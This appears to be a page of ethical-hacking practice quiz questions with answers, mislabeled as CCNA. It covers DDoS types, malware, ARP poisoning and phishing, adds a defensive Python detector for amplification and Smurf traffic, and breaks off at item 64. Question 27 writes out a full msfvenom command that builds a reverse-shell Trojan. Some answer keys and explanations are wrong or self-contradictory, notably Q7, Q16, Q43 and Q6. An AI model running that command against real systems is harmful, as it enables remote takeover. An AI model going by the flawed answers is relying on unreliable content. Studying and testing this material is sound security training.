CCNA Malware, Social Engineering and Network Attacks Questions

75 of 216 questions · Page 1/3 · Malware, Social Engineering and Network Attacks · Answers revealed

1
MCQ · medium

Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?

A. Amplification attack
B. HTTP flood
C. SYN flood
D. ICMP flood
Answer: A

Amplification uses reflectors to multiply traffic.

Why this answer

Amplification attacks (e.g., DNS, NTP, SNMP) send small queries with spoofed source IP to servers that reply with large responses to the victim.

2
MCQ · medium

A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?

A. Ettercap
B. Nmap
C. tcpdump
D. Wireshark
Answer: A

Ettercap is specifically designed for ARP poisoning and MITM attacks.

Why this answer

Ettercap is a comprehensive MITM tool that performs ARP poisoning. The symptom of incorrect ARP entries for the gateway is classic ARP cache poisoning.

3
Multi-Select · medium

Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)

Select 2 answers
A. UDP flood
B. HTTP flood
C. Slowloris
D. ICMP flood
E. SYN flood
Answers: B, C

Correct. HTTP flood sends many HTTP requests at the application layer.

Why this answer

Slowloris holds connections open, and HTTP floods send many HTTP requests. SYN flood and ICMP flood are network-layer attacks.

4
MCQ · hard

A SOC analyst observes a high number of incomplete TCP connections with the SYN flag set but no corresponding ACK from the target. The source IPs are spoofed and the connections are targeting port 80 on a web server. Which DDoS mitigation technique would be MOST effective in this scenario?

A. SYN cookies
B. Rate limiting
C. Anycast distribution
D. Ingress filtering
Answer: A

SYN cookies encode connection state in the SYN-ACK, allowing the server to avoid resource allocation until the handshake completes.

Why this answer

SYN flood attacks exploit the TCP three-way handshake by sending many SYN packets without completing the handshake. SYN cookies allow the server to avoid storing half-open connections, effectively mitigating SYN floods.

5
Multi-Select · medium

Which TWO of the following are characteristics of a polymorphic virus? (Select 2)

Select 2 answers
A. It spreads without user interaction.
B. It attaches to a host file and does not change.
C. It changes its code signature on each infection.
D. It uses encryption to hide its payload.
E. It only infects the boot sector.
Answers: C, D

Correct. Polymorphic viruses mutate their code.

Why this answer

Polymorphic viruses change their code signature each time they replicate, making detection difficult. They often use encryption to hide malicious code.

6
Multi-Select · hard

Which THREE of the following are techniques used in session hijacking?

Select 3 answers
A. DNS cache poisoning
B. Man-in-the-middle (MITM) interception
C. MAC flooding
D. Cookie theft and replay
E. TCP sequence number prediction
Answers: B, D, E

MITM attacks allow the attacker to intercept and manipulate session data.

Why this answer

Man-in-the-middle (MITM) interception is a core session hijacking technique where the attacker positions themselves between the client and server to intercept and manipulate traffic. By capturing session tokens or credentials in transit, the attacker can impersonate the legitimate user without needing to predict sequence numbers or steal cookies directly.

Exam trap

EC-Council often tests the distinction between attacks that enable session hijacking (like MITM) versus attacks that are merely precursors or different categories (like DNS poisoning or MAC flooding), so candidates mistakenly select options that facilitate but do not directly perform session hijacking.

7
MCQ · hard

An IDS alerts on a large number of outbound DNS queries from an internal host to a suspicious domain. The queries have random subdomains and the response size is large. Which attack is MOST likely in progress?

A. Slowloris attack
B. UDP flood
C. DNS amplification attack
D. DNS tunneling
Answer: C

Correct. The large responses and random subdomains indicate an amplification attack.

Why this answer

A DNS amplification attack uses open DNS resolvers to send large responses to a spoofed victim IP. The random subdomains are used to generate large responses, and the outbound queries are from the internal host acting as reflector.

8
Multi-Select · medium

Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)

Select 2 answers
A. Port knocking
B. ARP poisoning
C. Rate limiting
D. Scrubbing centers
E. MAC filtering
Answers: C, D

Rate limiting restricts the number of requests from a source, mitigating DDoS.

Why this answer

Rate limiting limits traffic per source, and scrubbing centers filter malicious traffic. Anycast distributes traffic, and blackholing drops traffic, but rate limiting and scrubbing are direct mitigations.

9
MCQ · easy

Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?

A. Ettercap
B. macof
C. Nmap
D. Wireshark
Answer: B

macof is specifically designed for MAC flooding.

Why this answer

macof (part of the dsniff suite) floods a switch with many fake MAC addresses, exhausting the CAM table and causing the switch to flood traffic out all ports.

10
MCQ · easy

A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?

A. Spyware exfiltrating data
B. A keylogger capturing keystrokes
C. A worm spreading across the network
D. Ransomware encrypting files
Answer: C

Worms often generate network traffic, including DNS queries, as they attempt to find and infect new hosts.

Why this answer

A worm self-replicates across the network, often generating unusual DNS queries as it spreads.

11
MCQ · easy

A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?

A. Whaling
B. Baiting
C. Vishing
D. Spear phishing
Answer: A

Whaling is a form of spear phishing that targets senior executives, often with urgent requests.

Why this answer

Whaling targets high-level executives (like the CEO) with personalized phishing emails. The urgency and impersonation of a CEO are classic whaling indicators.

12
MCQ · hard

A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?

A. UDP flood
B. SYN flood
C. Smurf attack
D. Ping of Death
Answer: C

Smurf sends ICMP echo requests to the broadcast address with a spoofed source, causing amplification.

Why this answer

A Smurf attack sends ICMP echo requests to the network broadcast address with the victim's spoofed source IP, causing all hosts to reply to the victim, amplifying traffic.

13
MCQ · easy

Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?

A. Nmap
B. Ettercap
C. Wireshark
D. Metasploit
Answer: B

Ettercap supports ARP poisoning, DNS spoofing, and other MITM techniques.

Why this answer

Ettercap is a well-known suite for ARP poisoning, enabling MITM attacks. It can intercept traffic between hosts on a switched network.

14
MCQ · medium

A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?

A. HTTP flood
B. Slowloris attack
C. SYN flood
D. UDP flood
Answer: B

Slowloris partially sends HTTP headers and keeps connections open.

Why this answer

Slowloris is a low-bandwidth application-layer DoS attack that keeps many connections open by sending partial HTTP requests, exhausting server resources.

15
MCQ · easy

Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?

A. Trojan
B. Ransomware
C. Worm
D. Virus
Answer: C

Worms self-replicate without host files.

Why this answer

Worms are standalone malware that self-replicate and spread over networks.

16
MCQ · medium

During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?

A. Ransomware
B. Backdoor
C. Keylogger
D. Downloader
Answer: B

Correct. A backdoor Trojan provides unauthorized remote access to the system.

Why this answer

A Remote Access Trojan (RAT) provides the attacker with remote control over the victim machine, often with features for persistence and stealth.

17
MCQ · medium

A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?

A. Ping of Death
B. HTTP flood
C. SYN flood
D. Slowloris
Answer: D

Slowloris sends slow partial HTTP headers to keep connections open.

Why this answer

Slowloris is an application-layer DDoS attack that holds connections open by sending partial HTTP requests, exhausting server connection pools. It uses many sources and slow sending.

18
Multi-Select · medium

Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)

Select 2 answers
A. It does not require a host file to spread
B. It changes its code signature each time it replicates
C. It uses a mutation engine to generate new decryption routines
D. It only infects the master boot record
E. It attaches to email messages automatically
Answers: B, C

Polymorphic viruses mutate to avoid detection.

Why this answer

Polymorphic viruses change their code signature each time they replicate, using mutation engines to evade signature detection.

19
MCQ · easy

Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?

A. Wireshark
B. Nmap
C. Metasploit
D. SET
Answer: D

SET is the Social Engineering Toolkit, designed for automating social engineering attacks.

Why this answer

The Social Engineering Toolkit (SET) is a well-known framework for automating social engineering attacks.

20
MCQ · medium

A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?

A. Ping of Death
B. Smurf attack
C. UDP flood
D. SYN flood
Answer: D

Correct. A SYN flood sends many SYN packets with no final ACK, overwhelming the target.

Why this answer

A SYN flood sends many SYN packets without completing the handshake, exhausting target resources. The attacker's server is the source, indicating it is being used to launch the attack.

21
MCQ · medium

After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?

A. DLL hijacking
B. Privilege escalation
C. Process injection
D. Buffer overflow
Answer: C

CreateRemoteThread and WriteProcessMemory are used to inject code into a remote process.

Why this answer

These Windows API functions are commonly used for process injection, where code is written into another process's memory and executed. This is a common malware technique to evade detection.

22
Multi-Select · medium

Which TWO of the following are examples of application layer DDoS attacks? (Select two.)

Select 2 answers
A. Slowloris
B. UDP flood
C. Smurf attack
D. HTTP flood
E. SYN flood
Answers: A, D

Correct. Slowloris keeps many connections open to exhaust server resources.

Why this answer

Slowloris and HTTP flood are application layer attacks that target web servers by exhausting connections or sending high volumes of HTTP requests.

23
Multi-Select · hard

Which THREE of the following are techniques used in session hijacking? (Select three.)

Select 3 answers
A. ARP poisoning
B. DNS amplification
C. TCP sequence prediction
D. Cookie theft
E. MAC flooding
Answers: A, C, D

Correct. ARP poisoning enables MITM, which can be used to hijack sessions.

Why this answer

TCP sequence prediction allows an attacker to guess sequence numbers and inject packets. Cookie theft (e.g., via XSS) steals session tokens. ARP poisoning enables MITM to intercept and hijack sessions.

24
MCQ · easy

Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?

A. Nmap
B. Wireshark
C. Metasploit
D. Ettercap
Answer: D

Ettercap supports ARP poisoning, DNS spoofing, and other MITM techniques.

Why this answer

Ettercap is a comprehensive suite for man-in-the-middle attacks on LAN, featuring ARP poisoning capabilities. Wireshark is a packet analyzer, Nmap is a network scanner, and Metasploit is an exploitation framework.

25
MCQ · easy

Which of the following is a characteristic of a polymorphic virus?

A. It changes its code pattern with each infection to evade detection
B. It remains dormant until a specific date
C. It spreads without user interaction
D. It attaches to the boot sector of a hard drive
Answer: A

Correct. Polymorphic viruses mutate their code to avoid signature-based detection.

Why this answer

Polymorphic viruses change their code signature each time they replicate, making signature-based detection difficult.

26
Multi-Select · medium

Which TWO of the following are examples of application-layer DDoS attacks?

Select 2 answers
A. ICMP flood
B. Slowloris
C. SYN flood
D. HTTP flood
E. UDP flood
Answers: B, D

Slowloris keeps many connections open by sending partial HTTP requests.

Why this answer

Slowloris and HTTP flood are application-layer attacks targeting the web server's ability to handle requests. SYN flood and UDP flood are lower-layer attacks (transport and network).

27
MCQ · hard

A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?

A. Generating a Trojan
B. Creating a virus
C. Deploying a worm
D. Initiating a DoS attack
Answer: A

The payload is a backdoor that allows remote control, characteristic of a Trojan.

Why this answer

Msfvenom generates a payload. The payload 'windows/meterpreter/reverse_tcp' creates a reverse shell that connects back to the attacker's IP and port. This is a classic Trojan/backdoor, specifically a remote access Trojan (RAT).

28
MCQ · medium

During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?

A. Session hijacking
B. MAC flooding
C. DNS spoofing
D. ARP poisoning
Answer: D

ARP poisoning sends unsolicited ARP replies to map an IP to a different MAC, enabling MITM.

Why this answer

ARP poisoning (also known as ARP spoofing) involves sending forged ARP replies to associate an IP with a different MAC, enabling MITM attacks. The other options do not fit the ARP reply pattern.

29
Multi-Select · medium

A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack are the analyst most likely witnessing?

Select 2 answers
A. Smurf attack
B. Volumetric attack
C. Application-layer (Layer 7) attack
D. SYN flood attack
E. Distributed denial-of-service (DDoS) attack
Answers: C, E

HTTP GET requests targeting a specific page are application-layer.

Why this answer

HTTP flood is an application-layer DDoS that sends many seemingly legitimate requests. Distributed means many sources. Volumetric floods rely on raw bandwidth, and a SYN flood exploits the TCP handshake, so neither fits the observed traffic.

30
MCQ · medium

A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?

A. Smurf attack
B. Ping of Death
C. SYN flood
D. Slowloris
Answer: A

ICMP echo requests are sent to broadcast addresses with a spoofed source IP.

Why this answer

A Smurf attack uses ICMP echo requests to a broadcast address, causing all hosts to reply and flood the victim.

31
Multi-Select · easy

Which TWO of the following are types of malware that specifically aim to demand payment from victims?

Select 2 answers
A. Keylogger
B. Spyware
C. Scareware
D. Ransomware
E. Adware
Answers: C, D

Scareware displays fake alerts to trick users into paying for removal.

Why this answer

Ransomware encrypts files and demands ransom; scareware tricks users into paying for fake threats.

32
MCQ · easy

Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?

A. Trojan
B. Ransomware
C. Worm
D. Virus
Answer: C

Worms self-propagate across networks independently.

Why this answer

Worms are standalone malware that self-replicate and spread across networks. Viruses require a host file, Trojans disguise as legitimate software, and ransomware focuses on encryption.

33
MCQ · easy

Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?

A. Strings
B. PEiD
C. VirusTotal
D. Cuckoo Sandbox
Answer: D

Cuckoo Sandbox is a dynamic analysis tool that executes malware in a sandbox and monitors behavior.

Why this answer

Cuckoo Sandbox is a popular open-source automated malware analysis system that runs samples in an isolated environment and reports behavior.

34
MCQ · easy

Which type of malware encrypts the victim's files and demands payment for the decryption key?

A. Keylogger
B. Spyware
C. Adware
D. Ransomware
Answer: D

Correct. Ransomware encrypts files and demands ransom.

Why this answer

Ransomware is designed to encrypt files and demand ransom for the decryption key.

35
MCQ · medium

During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?

A. Polymorphic virus
B. Ransomware
C. Trojan
D. Worm
Answer: C

The process masquerades as a legitimate service (svchost.exe) to avoid detection, typical of a Trojan or backdoor.

Why this answer

The name 'svch0st.exe' mimics 'svchost.exe', a legitimate Windows process. Such masquerading is common with Trojans and backdoors, and the absence of a digital signature combined with high CPU usage suggests malicious activity. A Trojan or backdoor is therefore most likely.

36
MCQ · medium

A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?

A. The network is using a switch instead of a hub
B. The switch is preventing sniffing due to port security
C. The analyst is not using the correct filter in Wireshark
D. The network interface is not in promiscuous mode
Answer: A

Switches send frames only to the specific port, making sniffing difficult without additional techniques.

Why this answer

A switch only forwards traffic to the port where the destination MAC resides; promiscuous mode only affects the local NIC, not switch behavior.

37
Multi-Select · medium

Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)

Select 2 answers
A. Smurf attack
B. SYN flood
C. HTTP flood
D. Slowloris
E. UDP flood
Answers: A, B

Smurf attack uses ICMP echo requests with spoofed source IP.

Why this answer

SYN flood and Smurf attack exploit TCP/IP protocol weaknesses.

38
MCQ · medium

An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?

A. Vishing
B. Phishing
C. Baiting
D. SMiShing
Answer: D

SMiShing is phishing via SMS.

Why this answer

SMiShing (SMS phishing) is a phishing attack conducted via SMS text messages. The message uses urgency to trick the recipient into revealing credentials.

39
MCQ · easy

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

A. Ransomware
B. Trojan
C. Spyware
D. Adware
Answer: A

Ransomware encrypts files and demands payment for decryption.

Why this answer

Ransomware is specifically designed to encrypt files and demand ransom. The other options do not typically encrypt files for ransom.

40
MCQ · easy

Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?

A. Metasploit
B. Nmap
C. Wireshark
D. SET
Answer: D

SET is the Social Engineering Toolkit.

Why this answer

The Social Engineering Toolkit (SET) is a framework for social engineering attacks, including phishing.

41
MCQ · easy

An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?

A. Spear phishing
B. Whaling
C. Baiting
D. Phishing
Answer: B

Whaling targets high-profile executives like the CFO, often with CEO impersonation.

Why this answer

Whaling targets high-profile individuals such as executives. Spear phishing targets specific individuals; whaling is the variant aimed at 'whales' (big fish). Strictly read, the stem only says the email appears to come from the CEO and does not state that the recipient is an executive, so a targeted email to an ordinary employee would be spear phishing. The scenario is intended as a whaling case: an email sent to the company CFO that appears to come from the CEO and requests an urgent wire transfer, for which the answer is 'Whaling'.

42
MCQ · hard

A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?

A. Adware
B. Worm
C. Trojan backdoor
D. Ransomware
Answer: C

A backdoor Trojan may use LDAP for covert communication.

Why this answer

Port 389 is used by LDAP. Outbound LDAP traffic from an internal server to multiple external IP addresses is unusual, since directory services normally stay inside the network; in a malware context it could indicate a backdoor or RAT using LDAP for command and control or data exfiltration. Given the options, a Trojan backdoor is the most plausible.

43
Multi-Select · medium

Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)

Select 2 answers
A. Ransomware
B. Macro virus
C. Polymorphic virus
D. Worm
E. Trojan horse
Answers: A, E

Both are often delivered via phishing links or attachments that require user interaction.

Why this answer

Trojans typically require user interaction to execute, and ransomware often requires user action (clicking a link or opening an attachment) to trigger. Worms and polymorphic viruses can spread without user interaction, though viruses generally need a host file.

44
Multi-Select · hard

Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)

Select 3 answers
A. Unexpected network traffic on ports typically used for remote administration
B. Persistent high CPU usage by a single process
C. Unauthorized processes running in the background
D. Increased number of DNS queries to known legitimate sites
E. Unusual outbound connections to unknown IP addresses
Answers: A, C, E

Backdoors often use ports like 4444, 1337 for communication.

Why this answer

Backdoor Trojans often cause unusual network connections to unknown IPs, unexpected outbound traffic, and unauthorized processes running. High CPU usage alone could be other malware, but combined with network activity it's indicative.

45
Multi-Select · hard

Which THREE of the following are techniques used in static malware analysis? (Select 3)

Select 3 answers
A. Inspecting file metadata and properties
B. Capturing network traffic in a sandbox
C. Searching for suspicious strings in the binary
D. Analyzing the file's structure using PEiD
E. Monitoring registry changes during execution
Answers: A, C, D

These three techniques examine the file without executing it, which is static analysis.

Why this answer

Static analysis examines the binary without execution. Inspecting file metadata, searching for suspicious strings, and analyzing the file's structure (e.g., using PEiD) are static techniques. Monitoring registry changes and network connections require execution (dynamic analysis).

46
Multi-Select · hard

Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)

Select 3 answers
A. MAC address filtering
B. Scrubbing centers
C. Anycast routing
D. Rate limiting
E. Disabling DHCP
Answers: B, C, D

Dedicated infrastructure filters out attack traffic.

Why this answer

Rate limiting restricts traffic per source, scrubbing centers filter malicious traffic, and anycast disperses traffic across multiple nodes to absorb attacks.

47
MCQ · medium

A security analyst observes a sudden flood of ICMP echo request packets from multiple external IPs to a single internal server. The packets have varying sizes and spoofed source addresses. Which type of attack is MOST likely occurring?

A. Ping of Death
B. ICMP flood
C. Smurf attack
D. SYN flood
Answer: B

Multiple sources sending ICMP echo requests with spoofed IPs is a classic ICMP flood, a volumetric DoS.

Why this answer

A distributed ICMP flood (ping flood) uses multiple sources to overwhelm a target with ICMP echo requests. Spoofed source addresses and varying packet sizes are common characteristics.

48
MCQ · medium

A security team detects a large number of UDP packets from multiple sources directed at a single server's DNS port (53). The packets appear to have a spoofed source IP of the target. Which type of DDoS attack is being observed?

A. DNS amplification
B. UDP flood
C. SYN flood
D. ICMP flood
Answer: A

Attackers send small queries with spoofed source IP to open DNS resolvers, which reply with large responses to the victim.

Why this answer

A DNS amplification attack uses open DNS resolvers to send large responses to a spoofed victim IP, amplifying traffic. The characteristics include UDP, port 53, spoofed source, and many sources (amplifiers).

49
MCQ · medium

Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?

A. Ettercap
B. tcpdump
C. Wireshark
D. Nmap
Answer: C

Wireshark captures and analyzes packets.

Why this answer

Wireshark is the standard tool for capturing and analyzing network packets in pcap format.

50
MCQ · easy

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

A. Spyware
B. Adware
C. Keylogger
D. Ransomware
Answer: D

Ransomware encrypts files and demands ransom.

Why this answer

Ransomware encrypts files and demands ransom, typically in cryptocurrency.

51
Multi-Select · medium

Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)

Select 2 answers
A. TCP sequence prediction
B. MAC flooding
C. Cookie theft
D. DNS spoofing
E. ARP poisoning
Answers: A, C

Attackers can predict sequence numbers to hijack a TCP session.

Why this answer

TCP sequence prediction is a core technique in session hijacking where an attacker predicts or sniffs the TCP sequence numbers used by the client and server to inject forged packets and take over an established TCP session. By correctly guessing the next sequence number, the attacker can spoof the client's IP address and send malicious commands that the server accepts as legitimate traffic.

Exam trap

The trap here is confusing network-level attacks like ARP poisoning or DNS spoofing with session hijacking, which specifically requires taking over an authenticated session by manipulating TCP sequence numbers or stealing session tokens.

52
Multi-Select · hard

Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)

Select 3 answers
A. Spoofs the source IP address of the victim
B. Amplifies traffic by sending small queries that generate large responses
C. Uses open DNS resolvers
D. Exploits the TCP handshake process
E. Floods the target with small ICMP packets
Answers: A, B, C

Queries are sent with the victim's IP as source so responses go to victim.

Why this answer

DNS amplification uses open DNS resolvers, spoofs the victim's IP, and exploits small queries to generate large responses, thereby amplifying traffic.

53
MCQ · easy

Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?

A. Boot sector virus
B. Polymorphic virus
C. Macro virus
D. Worm
Answer: B

Polymorphic viruses change their code to evade signature detection.

Why this answer

Polymorphic viruses change their code signature (using mutation engines) each replication to avoid detection.

54
Multi-Select · medium

Which TWO of the following are examples of amplification attacks used in DDoS?

Select 2 answers
A. DNS amplification
B. NTP amplification
C. Slowloris
D. SYN flood
E. Ping of Death
Answers: A, B

DNS amplification uses small queries to generate large responses.

Why this answer

Amplification attacks exploit protocols that respond with larger payloads than the request, magnifying traffic. NTP and DNS are common examples.

55
MCQ · easy

Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?

A. Worm
B. Trojan horse
C. Virus
D. Ransomware
Answer: A

Worms are self-replicating and spread automatically.

Why this answer

Worms are standalone self-replicating malware that spread across networks without needing to attach to host files.

56
MCQ · hard

An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?

A. UDP flood
B. SYN flood
C. Slowloris
D. HTTP flood
Answer: C

Slowloris sends incomplete HTTP requests to keep connections open, exhausting connection pool.

Why this answer

Slowloris sends partial HTTP requests to keep connections open, exhausting the server's connection pool.

57
MCQ · medium

An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?

A. Anycast
B. Scrubbing center
C. Rate limiting
D. Load balancing
Answer: A

Anycast advertises the same IP prefix from multiple sites; BGP delivers each client's traffic to the topologically nearest one.

Why this answer

Anycast routing lets geographically separate servers share one IP address, so attack traffic is split among sites by routing rather than concentrated on one, and the aggregate capacity absorbs the flood. A load balancer distributes traffic behind a single ingress point and does nothing for the saturated link into that point.

58
MCQmedium

An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?

A.Use IPsec
B.Implement DNSSEC
C.Use a firewall
D.Disable DNS recursion
AnswerB

DNSSEC lets a resolver verify that DNS responses are genuine.

Why this answer

DNSSEC signs zone data with the zone owner's key; a validating resolver checks the RRSIG records against the chain of trust from the root and discards forged answers, which is exactly what a cache-poisoning attacker injects. It authenticates data but does not encrypt it. Disabling recursion on authoritative servers and randomizing source ports and transaction IDs raise the attacker's cost but do not let a resolver prove an answer is genuine.

59
Multi-Selecthard

Which THREE of the following are effective DDoS mitigation techniques? (Select 3)

Select 3 answers
A.Disabling TCP SYN cookies
B.Anycast network distribution
C.Scrubbing centers
D.Rate limiting
E.Using a single server with high bandwidth
AnswersB, C, D

Why this answer

Rate limiting caps traffic per source or service, scrubbing centers divert traffic (via BGP or DNS) and drop the malicious part before forwarding clean traffic, and anycast spreads the load across sites. Disabling SYN cookies removes a protection, and a single high-bandwidth server is still one target whose link can be saturated.

60
MCQmedium

A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?

A.Anycast network
B.Rate limiting
C.Load balancer
D.Scrubbing center
AnswerA

Anycast distributes traffic to multiple locations, mitigating volumetric attacks.

Why this answer

Anycast routing allows multiple servers to share the same IP address; traffic flows to the nearest server, distributing the load and absorbing DDoS attacks.

61
MCQhard

An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?

A.Pretexting
B.Tailgating
C.Baiting
D.Quid pro quo
AnswerB

Tailgating is physically following someone through a secure entrance.

Why this answer

Tailgating is when an unauthorized person follows an authorized individual through a controlled door without that person's knowledge or consent; when the employee knowingly holds the door, some sources call it piggybacking. It is a physical security breach, countered by mantraps, turnstiles and a one-badge-one-person policy.

62
MCQeasy

Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?

A.Spyware
B.Adware
C.Keylogger
D.Ransomware
AnswerD

Ransomware encrypts files and demands ransom.

Why this answer

Ransomware encrypts files and demands payment for decryption. Examples include CryptoLocker, WannaCry, and Locky.

63
MCQhard

A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?

A.Smurf attack
B.SYN flood
C.Ping of Death
D.ICMP flood
AnswerA

Correct. Smurf uses broadcast amplification and spoofed source IP to flood the victim.

Why this answer

A Smurf attack sends ICMP echo requests to a subnet's directed-broadcast address with the victim's address spoofed as the source, so every host on that subnet replies to the victim: one packet in, many packets out, which is broadcast amplification. The fix is on the router that owns the subnet: Cisco IOS has had no ip directed-broadcast as the default since 12.0, and hosts can be configured to ignore broadcast pings.
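Both the amplification item (question 54) and the Smurf item above come down to the same observable: a response far larger than its request, or a single request fanning out to a whole subnet. The following is an added example, not code from the quiz, that applies those two checks to constructed flow records; the record fields, the port list and the ratio threshold are assumptions, and the addresses are from the documentation ranges. Note that from a reflector's vantage point the victim looks like the client, which is why the ratio is reported per apparent client.

```python
"""Flag reflection/amplification abuse and Smurf-style directed-broadcast pings
in flow records. Added example; record layout and sample flows are constructed."""
import ipaddress

# Constructed sample flow records, one per direction of a conversation.
SAMPLE_FLOWS = [
    # 60-byte DNS query answered with 3,900 bytes: our resolver used as a reflector
    {"proto": "udp", "src": "198.51.100.7", "sport": 53, "dst": "203.0.113.10", "dport": 4444, "bytes": 3900, "pkts": 3, "icmp_type": None},
    {"proto": "udp", "src": "203.0.113.10", "sport": 4444, "dst": "198.51.100.7", "dport": 53, "bytes": 60, "pkts": 1, "icmp_type": None},
    # an ordinary lookup from an inside host
    {"proto": "udp", "src": "198.51.100.7", "sport": 53, "dst": "192.0.2.25", "dport": 51000, "bytes": 120, "pkts": 1, "icmp_type": None},
    {"proto": "udp", "src": "192.0.2.25", "sport": 51000, "dst": "198.51.100.7", "dport": 53, "bytes": 60, "pkts": 1, "icmp_type": None},
    # ICMP echo requests to the directed broadcast of 192.0.2.0/24, "from" the victim
    {"proto": "icmp", "src": "203.0.113.10", "sport": 0, "dst": "192.0.2.255", "dport": 0, "bytes": 84000, "pkts": 1000, "icmp_type": 8},
    # an ordinary ping to one host
    {"proto": "icmp", "src": "192.0.2.25", "sport": 0, "dst": "192.0.2.1", "dport": 0, "bytes": 84, "pkts": 1, "icmp_type": 8},
]

LOCAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]        # subnets we route for
AMPLIFIABLE_PORTS = {53, 123, 161, 1900, 11211}            # DNS, NTP, SNMP, SSDP, memcached
AMPLIFICATION_THRESHOLD = 10.0                             # response/request byte ratio


def amplification_ratios(flows):
    """Pair each UDP request to an amplifiable port with its reverse flow and
    return {(apparent_client, service_port): response_bytes / request_bytes}."""
    by_tuple = {(f["proto"], f["src"], f["sport"], f["dst"], f["dport"]): f for f in flows}
    ratios = {}
    for req in flows:
        if req["proto"] != "udp" or req["dport"] not in AMPLIFIABLE_PORTS:
            continue  # only flows addressed to an amplifiable service are requests
        resp = by_tuple.get((req["proto"], req["dst"], req["dport"], req["src"], req["sport"]))
        if resp is None:
            continue
        ratios[(req["src"], req["dport"])] = resp["bytes"] / req["bytes"]
    return ratios


def find_amplification(flows, threshold=AMPLIFICATION_THRESHOLD):
    """Apparent clients receiving responses at least `threshold` times their request size."""
    return {k: round(v, 1) for k, v in amplification_ratios(flows).items() if v >= threshold}


def find_smurf(flows, local_nets=LOCAL_NETS):
    """ICMP echo requests (type 8) addressed to a local subnet's broadcast address."""
    hits = []
    for f in flows:
        if f["proto"] != "icmp" or f["icmp_type"] != 8:
            continue
        dst = ipaddress.ip_address(f["dst"])
        if any(dst == net.broadcast_address for net in local_nets):
            hits.append((f["src"], f["dst"], f["pkts"]))
    return hits


if __name__ == "__main__":
    print("amplification:", find_amplification(SAMPLE_FLOWS))
    print("smurf:", find_smurf(SAMPLE_FLOWS))
```

A high ratio against one apparent client means the client is most likely the spoofed victim, so the response is to rate-limit or close the reflector (restrict recursion, disable monlist), not to block the "client"; the Smurf hit points at the router interface that should be dropping directed broadcasts.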

64
